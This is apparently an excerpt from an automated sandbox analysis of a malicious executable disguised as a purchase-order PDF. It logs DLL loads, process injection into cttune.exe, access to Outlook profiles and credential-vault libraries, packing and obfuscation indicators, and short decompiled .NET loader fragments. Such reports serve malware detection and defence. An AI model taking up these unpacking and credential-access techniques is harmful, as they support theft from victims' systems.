Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cttune.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO-000172483 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-000172483 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cttune.pdb source: PO-000172483 pdf.exe, 00000007.00000002.2611351967.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000003.2558978346.0000000000FCB000.00000004.00000001.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288709951.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cttune.pdbGCTL source: PO-000172483 pdf.exe, 00000007.00000002.2611351967.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000003.2558978346.0000000000FCB000.00000004.00000001.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288709951.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycnUEzgloE.exe, 0000000A.00000000.2522172349.0000000000A8E000.00000002.00000001.01000000.0000000C.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685844897.0000000000A8E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-000172483 pdf.exe, 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2611330271.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2613954732.0000000004891000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-000172483 pdf.exe, PO-000172483 pdf.exe, 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2611330271.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2613954732.0000000004891000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Unpacked PE file: 0.2.PO-000172483 pdf.exe.120000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Unpacked PE file: 0.2.PO-000172483 pdf.exe.120000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RljNRwvexVjjsB76UM.cs	.Net Code: E995iOI9Oi System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RljNRwvexVjjsB76UM.cs	.Net Code: E995iOI9Oi System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RljNRwvexVjjsB76UM.cs	.Net Code: E995iOI9Oi System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA4479 push edi; ret	0_2_00BA447A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA8FFA push 0000004Bh; iretd	0_2_00BA9004
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_004178CA push edx; iretd	7_2_004178CD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_004150EB push esp; iretd	7_2_0041514F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040D8B6 push ecx; ret	7_2_0040D8B7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00415119 push esp; iretd	7_2_0041514F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00424A53 push 3D550B4Fh; ret	7_2_00424A6B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00417A3B push ebx; iretd	7_2_00417A3C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00423D13 push edi; retf	7_2_00423D1E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040AEDA push FFFFFF84h; retf	7_2_0040AEDC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_004036A0 push eax; ret	7_2_004036A2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017409AD push ecx; mov dword ptr [esp], ecx	7_2_017409B6
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04BFF780 push FFFFFF84h; retf	10_2_04BFF782
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C09991 push esp; iretd	10_2_04C099F5
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C099BF push esp; iretd	10_2_04C099F5
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0215C push ecx; ret	10_2_04C0215D
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0C170 push edx; iretd	10_2_04C0C173
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0C2E1 push ebx; iretd	10_2_04C0C2E2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A709AD push ecx; mov dword ptr [esp], ecx	11_2_04A709B6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A84227 push edx; iretd	11_2_00A8422A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A913B0 push 3D550B4Fh; ret	11_2_00A913C8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A84398 push ebx; iretd	11_2_00A84399
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A90670 push edi; retf	11_2_00A9067B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A9071B push esp; iretd	11_2_00A90741
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A77837 push FFFFFF84h; retf	11_2_00A77839
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A81A76 push esp; iretd	11_2_00A81AAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A81A48 push esp; iretd	11_2_00A81AAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A90CBD push edi; ret	11_2_00A90CBE
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9C0E6 push 1FFE80F5h; ret	11_2_04D9C0F6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D95064 push cs; retf	11_2_04D95065
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9617B push cs; retf	11_2_04D96182

Source: PO-000172483 pdf.exe

Static PE information: section name: .text entropy: 7.581091963671599

Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, vsEvR6jZkKPkGcvXL6.cs	High entropy of concatenated method names: 'gxOPYd5mLi', 'ilcPp1Go1b', 'JCAuNKpNAe', 'huduIRALR2', 'Hy2P1n0iH9', 'WsnPVMMD4Q', 'YuDPCGpkGG', 'BVlPJ4RyJY', 'un1PSnZB6D', 'dixP4ibjK1'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, rjGXLiIIsHKKl4gGXDP.cs	High entropy of concatenated method names: 'B5AbpxseXU', 'z8AbzWOhSd', 'EtDwN3Xogn', 'VhtwI7kbTa', 'N4Fw3xtVIO', 'OTfwyjd1lu', 'cyEw58SrkN', 'X6Uwc7b5PB', 'BcTwDCOjWJ', 'SNtwQnS7iJ'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, VhESNQ93BhEjTS9KbF.cs	High entropy of concatenated method names: 'qHHG47PnFj', 'Ed3GBRcOp1', 'uJLGoegj9e', 'ToString', 'dgyGjlTUtF', 'd2mGsKlPUR', 'gEpgZrBnSBpUXPqj75h', 'Sp0ZsrBvIa9hAD2yGQn', 'B26B9FBF7BsiHQIdCxa', 'zR0iqfBIABVO1hqn4Jf'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, nWNouE3XTCsmn8AWLg.cs	High entropy of concatenated method names: 'mjLiYB4Lc', 'U5fAyIMlg', 'XhCMP5H0h', 'dLZxiiheZ', 'QTMHmxlEa', 'djVUJwI3S', 'XaZZXZp8Ls0yot9ad3', 'ELEMlwMZReFok5jFc8', 'iFIuV7JEk', 'NMEbrEd14'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RljNRwvexVjjsB76UM.cs	High entropy of concatenated method names: 'RcYycuTHAc', 'L1fyDg9bQO', 'LnUyQxp554', 'Ae1ydIlDNe', 'a51yXX2tbX', 'wC6yG0AsWa', 'OIZylvV0AB', 'kNYyvqhSuF', 'egJyfY2qO1', 'PYOyWZTVk9'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, FgTnQAdFyMvgTUHRsm.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KOs3TVOkH3', 'x3H3pn7fjI', 'yLA3z6mY4t', 'aH5yNWcmmU', 'myeyITsSPN', 'pjhy378R9k', 'qM3yydKfUb', 'JuJC18V9lLJKLuXwZsq'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, qwQPRosefCodWlLFHk.cs	High entropy of concatenated method names: 'jHwrENjjC4', 'b2MrPBcmyG', 'mfcrrnkyw5', 'Pygrwinto8', 'inhrnrQnj8', 'gZFrkDlAUt', 'Dispose', 't13uDdCvXY', 'YNbuQKpr44', 'eUrudMZXZC'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, lyQmHtBFGgNcbIr078.cs	High entropy of concatenated method names: 'YLaPWIxeqv', 'oAtPaaF7oG', 'ToString', 'qIRPDJg3oY', 'pvtPQQ71IF', 'nmDPdrFSQx', 'IfHPXTxfgh', 'hZKPGvp3Qk', 'genPlAggyO', 'vgHPvlD3ya'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, I85skGI5ZfRyxjGkllF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sV2ZrIC221', 'CqRZbZJnj1', 'HCbZwblbvU', 'Vj4ZZOdN39', 'GkNZnkmcU4', 'eNvZF6Z42I', 't9BZkudI5R'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, zRjApUmse4aRdkDYIQ.cs	High entropy of concatenated method names: 'n6hlDw6Bhb', 'kMhldPI3Ov', 'in1lGMpsDR', 'jqKGpnD4JN', 'V72Gzn7yOg', 'CXTlNZGoRS', 'owKlIdUC3K', 'AxTl3W4yut', 'FFnlyUQMEj', 'q2il5mpsXe'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, aQOZCAHVvQwbZinXgB.cs	High entropy of concatenated method names: 'jZQdAbaQDP', 'N0vdMmKgGW', 'P0adtGuteG', 'hd4dHpttsq', 'eEbdEJdFEG', 'D1ud66V9LX', 'aTBdP3mr8c', 'E86duWK9yC', 'BOtdrCapQ4', 'FOZdbcbO0S'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, ioLwrm02KMeIjI7Ge4.cs	High entropy of concatenated method names: 'HLqlLwW9W0', 't79l81j1k2', 'fZRli7tnFU', 'Nq7lAJRVcF', 'OdVlgkCCaX', 'DdflMBcks7', 'taDlxgty4p', 'DBLltfVtKu', 'oWJlHiby6P', 'VyllUX4ZJ2'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, EkJkBftVd1N6EZjRuG.cs	High entropy of concatenated method names: 'M8AQJHhV36', 'GueQS4ZqXj', 'R29Q4TPcJV', 'rbsQB0ER2O', 'aerQoT3v9Q', 'KhOQjqXXWB', 'jNEQs4cWWn', 'y59QYlq6BA', 'fhNQTTLHvn', 'DyBQpgr1a6'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, VHHPgxTuQXlKY4I3le.cs	High entropy of concatenated method names: 'Qlvr2X446I', 'b2YrKHbZKm', 'pKCrhJXsPO', 'vRrrq1RS9k', 'Jpcr7nd3yr', 'WNMr9dLoan', 'ygormuYasg', 'QP0rOlrUp7', 'LZUr0ZiQ70', 'lAvrRDjGgj'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, Ixg4fAJMxepwcldWRO.cs	High entropy of concatenated method names: 'qhvERIiLZ0', 'OPqEV9DNKF', 'r35EJM1Kyj', 'YYjES3ZoSk', 'd4KEKE8Smq', 'jjiEhftuEZ', 'G0MEqScxeU', 'DdPE79Z7Eo', 'bX6E9VSPOR', 'eAYEmw7vR3'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, tlPgpnK3prN56VCpEH.cs	High entropy of concatenated method names: 'fb0SyNBHpNVKv1agdtK', 'Ciw6THBdhaNkhgfQ5o0', 'cnFGur0Kjf', 'wWYGrjC0qA', 'oTZGbFZd7m', 'MPXGdkBxosD23nImm9h', 'v2DYjGBUc0dR0QT5Pvc'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, YwqoPa4eWSsW8Wr9Lf.cs	High entropy of concatenated method names: 'ToString', 'WBt61q9uZG', 'zV56KZECFr', 'nfe6hfpGdE', 'x496qfWTnJ', 'cuO67Q8GF0', 'tUR69ApSro', 'wck6mhJB2f', 'oKx6OnoLAq', 'sYa6064cMs'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, dnRnq02WMNGAB1E7yE.cs	High entropy of concatenated method names: 'v0TGcpEl9N', 'C2RGQxw2s1', 'Vy9GXMc6NQ', 'xMAGlBCrbn', 'dqhGvmsSd9', 'pJcXojwuq2', 'D66XjLiJEw', 'SJGXs6dAPm', 'TncXYWK9p5', 'SKsXTYwbJy'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, YPrkuAU9X24lRFDp55.cs	High entropy of concatenated method names: 'jGRXgVoa5w', 'oTfXxdvVqi', 'AGNdhvb5g6', 'Pa1dqgUQlR', 'yJ5d7R5SpE', 'yytd95sNux', 'jQ1dmPtGZI', 'kkUdOTykNa', 'LUZd0fvIkZ', 'b4fdRaWUC6'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RmXQHeINsPOf6wgDmHe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vXXb1kUZ2G', 'SBJbVxEMfc', 'te9bCZQxvj', 'jY4bJVf1Aa', 'hTqbSXfuIl', 'jj2b4uIbX9', 'K4ebB5Dwhg'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, twJNAFzFy9bNoHRTlO.cs	High entropy of concatenated method names: 'As5bMS3ad1', 'BSkbtaL636', 'FP7bHl9Hsd', 'X3jb290FYw', 'UmZbKPh1fu', 'W04bqPNTgy', 'Gs8b7mVlfU', 'EHnbk9UPXb', 'w2dbLCaG5g', 'hptb8xE6PL'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, uhh4Fg5JMtYB1LxfUY.cs	High entropy of concatenated method names: 'rtHIlkJkBf', 'Pd1IvN6EZj', 'AVvIWQwbZi', 'vXgIaBpPrk', 'vDpIE555nR', 'vq0I6WMNGA', 'E15Wl6f90rjhICv1YJ', 'pZLDM2ipp7VWJ6Guin', 'APoIIJoqkN', 'W4mIy9ugIu'
